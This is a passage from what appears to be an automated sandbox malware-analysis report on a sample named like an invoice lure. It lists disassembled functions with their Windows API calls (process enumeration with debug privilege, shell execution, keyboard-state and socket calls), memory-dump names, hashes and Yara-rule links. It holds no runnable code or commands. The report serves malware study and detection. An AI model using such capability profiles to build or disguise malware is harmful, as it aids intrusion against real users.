                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 325d59870d29ff5ebc84fc52a98528173b2b88f73a04ee6adf8c3d9737f7bd68
                                                                                                                    • Instruction ID: 8fe8628a841c90769abf8b65f1a98fc7d2dd2ba795d8ae6007f837a26cb6633d
                                                                                                                    • Opcode Fuzzy Hash: 325d59870d29ff5ebc84fc52a98528173b2b88f73a04ee6adf8c3d9737f7bd68
                                                                                                                    • Instruction Fuzzy Hash: D241A8716202019FDB10EF24DC99F6EBBA5AF40310F19855DF9069B2C2CBB1AD68CF95
                                                                                                                    Function 002B2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 002B3033
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                    • Opcode ID: 13963b51a579867161c37ded26534ad5ba3a518d8b6864362a9ed2a2a1e8c4a9
                                                                                                                    • Instruction ID: eb0ce2326c29df55cf4023aff4652bd8236e8c6667afc9ead5890f1c69a3e28f
                                                                                                                    • Opcode Fuzzy Hash: 13963b51a579867161c37ded26534ad5ba3a518d8b6864362a9ed2a2a1e8c4a9
                                                                                                                    • Instruction Fuzzy Hash: 1311383266D347BAE715EF14DC82CEB679C9F1A3A0F10442AF904661C2DAB06F6445A4
                                                                                                                    Function 002B42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002B4312
                                                                                                                    • LoadStringW.USER32(00000000), ref: 002B4319
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002B432F
                                                                                                                    • LoadStringW.USER32(00000000), ref: 002B4336
                                                                                                                    • _wprintf.LIBCMT ref: 002B435C
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B437A
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 002B4357
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: 2e2b052a844e1749e83b2731ecbf9cf816ea3aa2f3100b50c0820a976bbbc5c6
                                                                                                                    • Instruction ID: 0b07c05575a8a4f2f3dc22f4fcee26cba207fe55d429819b88771cf937a9fbf2
                                                                                                                    • Opcode Fuzzy Hash: 2e2b052a844e1749e83b2731ecbf9cf816ea3aa2f3100b50c0820a976bbbc5c6
                                                                                                                    • Instruction Fuzzy Hash: F00162F2D01208BFE751ABA4EE8DEE6776CDB08300F1045A6B74AE2051EA749E954B74
                                                                                                                    Function 002DD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002DD47C
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002DD49C
                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002DD6D7
                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002DD6F5
                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002DD716
                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 002DD735
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002DD75A
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 002DD77D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    • Opcode ID: 25a032fd4ff7d2ffded0b27ed8d0b379e49b2d630f69eccdfeee9deb2a5022bf
                                                                                                                    • Instruction ID: 462fd722b6efd3f13201d8fd4de1b0552a51cd1008fbe57f6342b9a41b99f06e
                                                                                                                    • Opcode Fuzzy Hash: 25a032fd4ff7d2ffded0b27ed8d0b379e49b2d630f69eccdfeee9deb2a5022bf
                                                                                                                    • Instruction Fuzzy Hash: EDB19B75A00A16EFDF14CF68C9857AD7BB5BF08701F0880AAEC489B295D770AD60CB90
                                                                                                                    Function 00252A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 00252ACF
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00252B17
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 0028C21A
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 0028C286
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: 560dc66a26a8f5e37e842c204b3b526ab92e61867c65841e8fa76fcf7b7fd938
                                                                                                                    • Instruction ID: b67c92e719c37bfdf96e9c7889df04f50465204058672653711f8b14bf095be5
                                                                                                                    • Opcode Fuzzy Hash: 560dc66a26a8f5e37e842c204b3b526ab92e61867c65841e8fa76fcf7b7fd938
                                                                                                                    • Instruction Fuzzy Hash: 7B414B34635681DAC7399F289C8CB6A7B95AB87301F248419EC87425E0C770DC6DD728
                                                                                                                    Function 002B70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 002B70DD
                                                                                                                      • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
                                                                                                                      • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002B7114
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 002B7130
                                                                                                                    • _memmove.LIBCMT ref: 002B717E
                                                                                                                    • _memmove.LIBCMT ref: 002B719B
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 002B71AA
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002B71BF
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B71DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 256516436-0
                                                                                                                    • Opcode ID: 7beb51bdda5170c5757a4977f7eb4082182f872e3b06e6e1eb66f90be59999db
                                                                                                                    • Instruction ID: 1f1a4a0bb402ab2ef3879a7269bc9df3386a854602f7a8fbbac1d44d9fdc6693
                                                                                                                    • Opcode Fuzzy Hash: 7beb51bdda5170c5757a4977f7eb4082182f872e3b06e6e1eb66f90be59999db
                                                                                                                    • Instruction Fuzzy Hash: A7315031910205EBDB10DFA4DD89AAFB778EF45710F1481A6F9089B256DB709E24CB64
                                                                                                                    Function 002D61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002D61EB
                                                                                                                    • GetDC.USER32(00000000), ref: 002D61F3
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D61FE
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002D620A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002D6246
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002D6257
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002D902A,?,?,000000FF,00000000,?,000000FF,?), ref: 002D6291
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002D62B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: 52e141b6d815ff7a5810647f773fdc28b3f093491986806b8f27d79aa32cdaba
                                                                                                                    • Instruction ID: 3e41f29eb26b5276d8e5c882dfd1611875a730ae2cf403aff5f7cbaa702d6022
                                                                                                                    • Opcode Fuzzy Hash: 52e141b6d815ff7a5810647f773fdc28b3f093491986806b8f27d79aa32cdaba
                                                                                                                    • Instruction Fuzzy Hash: 68319C72201210BFEB118F20DC8EFEA3BADEF49761F044066FE099A291C6759C51CBA4
                                                                                                                    Function 002ABBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: 0a52ae35ae62463039b6f7a4e50fd5f700a7b5713355f7878b75d6f7036bc4db
                                                                                                                    • Instruction ID: c15f8b562d02b6a695341cfe41d0983a98293bfff24e5cab1a878c2e8d40a9aa
                                                                                                                    • Opcode Fuzzy Hash: 0a52ae35ae62463039b6f7a4e50fd5f700a7b5713355f7878b75d6f7036bc4db
                                                                                                                    • Instruction Fuzzy Hash: 2921F571670246BFA2066A269D53FBB735DAE1335CF048412FD0996283EF64DE34C5B1
                                                                                                                    Function 002BEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                      • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
                                                                                                                    • _wcstok.LIBCMT ref: 002BEC94
                                                                                                                    • _wcscpy.LIBCMT ref: 002BED23
                                                                                                                    • _memset.LIBCMT ref: 002BED56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                    • Opcode ID: c04b9a1109870cc8a6a56f16c35c885393a55862b725ef5f71c0d9da5e2ce213
                                                                                                                    • Instruction ID: dfed5f1d85f5b2a03ac38ec98e5b8ee91d0e5f206658f4e73b316003e9a71f50
                                                                                                                    • Opcode Fuzzy Hash: c04b9a1109870cc8a6a56f16c35c885393a55862b725ef5f71c0d9da5e2ce213
                                                                                                                    • Instruction Fuzzy Hash: C4C19130528301DFCB14EF24D855AAAB7E4BF45351F04492DF899972A2DB30EC69CF86
                                                                                                                    Function 002C6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002C6C00
                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002C6C21
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C6C34
                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 002C6CEA
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 002C6CA7
                                                                                                                      • Part of subcall function 002AA7E9: _strlen.LIBCMT ref: 002AA7F3
                                                                                                                      • Part of subcall function 002AA7E9: _memmove.LIBCMT ref: 002AA815
                                                                                                                    • _strlen.LIBCMT ref: 002C6D44
                                                                                                                    • _memmove.LIBCMT ref: 002C6DAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3619996494-0
                                                                                                                    • Opcode ID: 1aa7bf3df14223aae053b89bce29ea74c391ce17c67147842dc4c4e4cfd02733
                                                                                                                    • Instruction ID: 73672519714e61faf845edf01dbed8220a2f72fb80cfd4f4dac8425a1050789d
                                                                                                                    • Opcode Fuzzy Hash: 1aa7bf3df14223aae053b89bce29ea74c391ce17c67147842dc4c4e4cfd02733
                                                                                                                    • Instruction Fuzzy Hash: 5481F371224301ABD710EF24CC89F6BB7E8AF84714F144A1DF9569B2A2DB70DD14CB95
                                                                                                                    Function 00251424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d4954872706af93065c570a3710b25f983565f7d7ff3d8071773664cca4d8bf0
                                                                                                                    • Instruction ID: d053bd482257fec3a53742454c29dff2f901b3028fee9cf13e1bc39002c37c16
                                                                                                                    • Opcode Fuzzy Hash: d4954872706af93065c570a3710b25f983565f7d7ff3d8071773664cca4d8bf0
                                                                                                                    • Instruction Fuzzy Hash: 92719A3491010AEFCB05DF98CC49ABEBB79FF85311F148149F915AA291C730AA25CFA8
                                                                                                                    Function 002DB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00C26378), ref: 002DB3EB
                                                                                                                    • IsWindowEnabled.USER32(00C26378), ref: 002DB3F7
                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 002DB4DB
                                                                                                                    • SendMessageW.USER32(00C26378,000000B0,?,?), ref: 002DB512
                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 002DB54F
                                                                                                                    • GetWindowLongW.USER32(00C26378,000000EC), ref: 002DB571
                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002DB589
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4072528602-0
                                                                                                                    • Opcode ID: 2ded65fb99e0861e5f788811c6f4580a059090353b3a08b1abb49c18c7e366aa
                                                                                                                    • Instruction ID: 63c1ef1a7b720d457d6f6315b0a025d9a8dc544c051f00b9b866c50541a5b887
                                                                                                                    • Opcode Fuzzy Hash: 2ded65fb99e0861e5f788811c6f4580a059090353b3a08b1abb49c18c7e366aa
                                                                                                                    • Instruction Fuzzy Hash: B971A038615206EFDB26DF54C8B4FBA77B9EF49300F15805AE942973A2C731AC60DB50
                                                                                                                    Function 002CF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002CF448
                                                                                                                    • _memset.LIBCMT ref: 002CF511
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 002CF556
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                      • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 002CF5CD
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CF5FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3522835683-2766056989
                                                                                                                    • Opcode ID: 1bd1817b3c782124da33880df5d08d18815dd541123d37c5f8e5249b5588094d
                                                                                                                    • Instruction ID: fd495e8aab8b8c4ba880f15d2fc470a2b23213814ab925da2e39cf2d025e50e1
                                                                                                                    • Opcode Fuzzy Hash: 1bd1817b3c782124da33880df5d08d18815dd541123d37c5f8e5249b5588094d
                                                                                                                    • Instruction Fuzzy Hash: A161BB70A20619DFCB14DF64C984AAEBBB5FF49310F14816DE81AAB351CB30AD65CF84
                                                                                                                    Function 002B0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 002B0F8C
                                                                                                                    • GetKeyboardState.USER32(?), ref: 002B0FA1
                                                                                                                    • SetKeyboardState.USER32(?), ref: 002B1002
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 002B1030
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 002B104F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 002B1095
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002B10B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
